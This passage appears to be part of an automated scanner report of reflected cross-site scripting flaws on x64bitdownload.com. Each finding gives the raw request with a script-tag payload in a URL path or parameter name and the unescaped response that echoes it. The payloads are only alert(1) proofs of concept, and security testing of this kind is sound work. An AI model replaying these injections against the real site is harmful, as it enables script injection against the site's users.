HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:53:56 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:04:23 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22fast-download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22fast+download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 96386
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-fast-download-downloads.html9ab62"><script>alert(1)</script>4dead600d30" /> ...[SNIP]...
1.33. http://www.x64bitdownload.com/64-bit-fast-download-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-fast-download-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa2d1"><script>alert(1)</script>9e67a9dcdbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-fast-download-downloads.html?fa2d1"><script>alert(1)</script>9e67a9dcdbd=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:49:30 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:00:10 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22fast-download%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22fast+download%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 96389
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-fast-download-downloads.html?fa2d1"><script>alert(1)</script>9e67a9dcdbd=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4260b"><script>alert(1)</script>fce09807565 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-feed-downloads.html4260b"><script>alert(1)</script>fce09807565 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:53:18 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:03:24 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 92842
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-feed-downloads.html4260b"><script>alert(1)</script>fce09807565" /> ...[SNIP]...
1.35. http://www.x64bitdownload.com/64-bit-feed-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-feed-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a07ec"><script>alert(1)</script>6e593dfd62f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-feed-downloads.html?a07ec"><script>alert(1)</script>6e593dfd62f=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:49:00 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:59:04 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22feed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 92845
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-feed-downloads.html?a07ec"><script>alert(1)</script>6e593dfd62f=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3c51"><script>alert(1)</script>c2a577b8281 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-feedreader-downloads.htmlb3c51"><script>alert(1)</script>c2a577b8281 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:55:02 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:05:28 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 41110
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-feedreader-downloads.htmlb3c51"><script>alert(1)</script>c2a577b8281" /> ...[SNIP]...
1.37. http://www.x64bitdownload.com/64-bit-feedreader-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-feedreader-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d83d"><script>alert(1)</script>0d95b09fc58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-feedreader-downloads.html?5d83d"><script>alert(1)</script>0d95b09fc58=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:52:18 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:02:28 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 41113
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-feedreader-downloads.html?5d83d"><script>alert(1)</script>0d95b09fc58=1" /> ...[SNIP]...
1.38. http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-file-grabber-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82621"><script>alert(1)</script>c53057f24a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-file-grabber-downloads.html?82621"><script>alert(1)</script>c53057f24a8=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:55:52 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:06:10 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 94070
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-file-grabber-downloads.html?82621"><script>alert(1)</script>c53057f24a8=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be4af"><script>alert(1)</script>ad7bd7c1eb9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-file-sharing-downloads.htmlbe4af"><script>alert(1)</script>ad7bd7c1eb9 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:49:50 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:59:56 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-sharing%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+sharing%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 94439
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-file-sharing-downloads.htmlbe4af"><script>alert(1)</script>ad7bd7c1eb9" /> ...[SNIP]...
1.40. http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-file-sharing-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 817d3"><script>alert(1)</script>83b84f29eb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-file-sharing-downloads.html?817d3"><script>alert(1)</script>83b84f29eb9=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:48:16 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:58:17 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-sharing%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+sharing%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 94442
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-file-sharing-downloads.html?817d3"><script>alert(1)</script>83b84f29eb9=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20c23"><script>alert(1)</script>323d5f8b558 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-forum-c-44-newsgroup-clients-downloads.html20c23"><script>alert(1)</script>323d5f8b558 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:38:40 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:48:46 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 33942
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-forum-c-44-newsgroup-clients-downloads.html20c23"><script>alert(1)</script>323d5f8b558" /> ...[SNIP]...
1.42. http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63229"><script>alert(1)</script>158ae792632 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-forum-c-44-newsgroup-clients-downloads.html?63229"><script>alert(1)</script>158ae792632=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:36:20 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:46:24 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 33945
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-forum-c-44-newsgroup-clients-downloads.html?63229"><script>alert(1)</script>158ae792632=1" /> ...[SNIP]...
1.43. http://www.x64bitdownload.com/64-bit-forum-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-forum-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34dd1"><script>alert(1)</script>b828f5462c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-forum-downloads.html?34dd1"><script>alert(1)</script>b828f5462c6=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:57:31 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:07:41 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 91047
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-forum-downloads.html?34dd1"><script>alert(1)</script>b828f5462c6=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21a7c"><script>alert(1)</script>2d7fe0d2eb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-forums-downloads.html21a7c"><script>alert(1)</script>2d7fe0d2eb0 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 16:00:44 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:10:48 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 87218
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-forums-downloads.html21a7c"><script>alert(1)</script>2d7fe0d2eb0" /> ...[SNIP]...
1.45. http://www.x64bitdownload.com/64-bit-forums-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-forums-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8eaef"><script>alert(1)</script>f7180ec1d07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-forums-downloads.html?8eaef"><script>alert(1)</script>f7180ec1d07=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:56:12 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:06:37 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 87221
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-forums-downloads.html?8eaef"><script>alert(1)</script>f7180ec1d07=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0d91"><script>alert(1)</script>fc86d6334b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-grabber-downloads.htmle0d91"><script>alert(1)</script>fc86d6334b HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:59:17 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:09:21 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 98832
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-grabber-downloads.htmle0d91"><script>alert(1)</script>fc86d6334b" /> ...[SNIP]...
1.47. http://www.x64bitdownload.com/64-bit-grabber-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-grabber-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ac7"><script>alert(1)</script>733f69cdf35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-grabber-downloads.html?86ac7"><script>alert(1)</script>733f69cdf35=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:55:54 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:06:09 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 98836
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-grabber-downloads.html?86ac7"><script>alert(1)</script>733f69cdf35=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5d17"><script>alert(1)</script>831c8190191 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-group-downloads.htmld5d17"><script>alert(1)</script>831c8190191 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
